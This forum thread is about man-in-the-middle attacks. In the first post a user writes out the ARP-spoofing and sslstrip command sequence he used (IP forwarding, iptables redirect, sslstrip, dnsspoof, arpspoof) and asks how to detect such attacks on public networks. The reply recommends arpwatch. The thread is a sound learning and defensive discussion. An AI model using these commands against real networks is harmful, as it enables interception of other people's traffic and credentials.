Results 1 to 2 of 2

Thread: man in the middle

  1. #1
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default man in the middle

    Hi

    I just learn how to do a man in the middle attack with sslstrip i finally understood that using wired or wireless connection is not secure. Well I knew those danders with wlan, but I taught wired connection to be save.

    Is this the "best" way to do this, or does I do something unneeded.
    Code:
    Shell
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    Shell
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    
    Shell
    sslstrip -a -l 8080
    Shell
    dnsspoof
    
    Shell
    arpspoof -i eth0 -t (target) (gateway)
    Cause this arpspoofing etc. is so easy to do so how can I find out if someone is doing this. Like if I'm in public WLAN. Yes, I sslstrip creates that fake certificate, but just messenger etc.

    Well I can use wireshark and look if there is anything strange in ARP. is there a easier way to do it?

  2. #2
    Member M1ck3y's Avatar
    Join Date
    Jul 2008
    Location
    Lost in the darkness
    Posts
    72

    Default Re: man in the middle

    You can use this: Arpwatch.

    arpwatch monitors mac adresses on your network and writes them into a file.
    last know timestamp and change notification is included. use it to monitor for unknown (and as such, likely to be intruder's) mac adresses or somebody messing around with your arp_/dns_tables.
    --~ Internet is in the air we are breathing, so it should be free for everyone. We'll get there, just wait and see... ~--

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •